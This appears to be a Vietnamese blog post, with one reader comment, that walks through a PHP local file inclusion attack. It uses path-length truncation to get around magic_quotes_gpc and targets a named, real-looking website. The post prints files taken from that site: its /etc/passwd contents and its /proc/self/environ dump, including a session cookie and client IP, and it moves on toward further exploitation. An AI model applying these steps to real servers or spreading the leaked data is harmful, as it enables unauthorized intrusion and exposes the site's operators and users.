PHP filesystem attack vectors
http://www.ush.it/20...attack-vectors/ <—- link cho các bạn kham thảo
nội dung chủ yếu xoay quanh vấn đề :
– Trong php(linux) các bạn include file : /etc/passwd/./././. sẽ trả ra cùng với quả với việc các bạn include : /etc/passwd <——- lợi dụng cái này để bypass blackist trong các hàm ghi file của các editor…
– Trong các hàm liên quan đến file của PHP,ví dụ như hàm include : include(path) thì biến path là đường dẫn đến file cần include,tuy nhiên biến path này cũng có giới hạn số ký tự <—- mình dùng cái này cho các site bị LFI mà không thể dùng null byte (do magic_quotes_gpc = On) để kết thúc chuỗi
Chi tiết victim mình chọn là :
http://cinebox212.co...ex.php?page=abc <— đề nghị các bạn không được phá hoại trang web này,đây mình chỉ demo cho các bạn xem kỹ thuật hoàn toàn không khuyến khích
các bạn có hành động phá hoại
B1 : kiểm tra lỗi
require_once(modules/abc.php) <———— dính chưởng
B2 : kiểm tra xem magic_quotes_gpc on hay off
Warning: require_once(modules/abc\0.php) [function.require-once]: failed to open stream: No such file or directory in /home/cinebox212/domains/cinebox212.com.vn/public_html/classes/webpage.php on line 274
<—————- magic_quotes_gpc = On rồi :”>
B3 : kiểm tra xem limit path của hàm require_once là bao nhiêu
414 Request-URI Too Large <— 2030 thì hơi bị bự
giảm xuống cái : 2020
giảm tiếp vậy
khà khà vậy là ở giữa 2010 và 2015
đoán tiếp vậy
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
<———– Cool exploit thành công
Tiếp theo thử xem mình có đủ quyền để truy cập vào /proc/self/environ hay không
do đường dẫn : /etc/passwd và /proc/self/environ thì cái /proc/self/environ nhiều ký tự hơn nên mình phải xóa bớt /.
B4 : exploit
DOCUMENT_ROOT=/home/cinebox212/domains/cinebox212.com.vn/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7 HTTP_ACCEPT_ENCODING=gzip,deflate HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5 HTTP_CONNECTION=close HTTP_COOKIE=PHPSESSID=9a5b8be46db1c0d5333dda79400713c3 HTTP_HOST=cinebox212.com.vn HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 HTTP_X_FORWARDED_FOR=125.234.5.26 HTTP_X_REAL_IP=125.234.5.26 PATH=/bin:/usr/bin PHPRC=/usr/local/etc/php5/cgi/ QUERY_STRING=page=./../../../../../../../proc/self/environ/
cool
Xong rồi,thử lấy PHP info thông qua LFI xem
PHP Version 5.2.10 <—
[+] Link video : http://www.mediafire.com/?2w4ynk49q297ft0
Mình đọc nhưng vẫn chưa hiểu lắm. Video thì bị lỗi rồi. Bạn có thể up lại cho mình down về nghiên cứu không. Thanks!
Trả lờiXóa